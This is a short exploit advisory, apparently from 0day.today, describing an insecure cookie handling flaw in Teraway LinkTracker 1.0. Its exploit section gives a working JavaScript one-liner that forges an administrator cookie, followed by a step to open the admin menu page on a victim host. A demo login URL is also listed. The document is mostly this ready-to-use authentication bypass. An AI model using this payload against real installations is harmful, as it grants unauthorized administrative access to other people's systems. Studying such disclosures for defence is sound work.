Teraway LinkTracker 1.0 Insecure Cookie Handling Vulnerability

==============================================================
Teraway LinkTracker 1.0 Insecure Cookie Handling Vulnerability
==============================================================


-------------------------------------[+]
Homepage:http://www.teraway.com
Product: Teraway LinkTracker V1.0
-------------------------------------
Teraway LinkTracker V1.0 Insecure Cookie Handling Vuln
-------------------------------------
Exploit:
--------

javascript:document.cookie="twLTadmin=userid=1&lvl=1;path=/";
Then Go to  http://victim/path/menu.asp

demo
----
http://www.teraway.com/linktracker/demo/login.asp


--------------------------------------------------



#  0day.today [2018-04-14]  #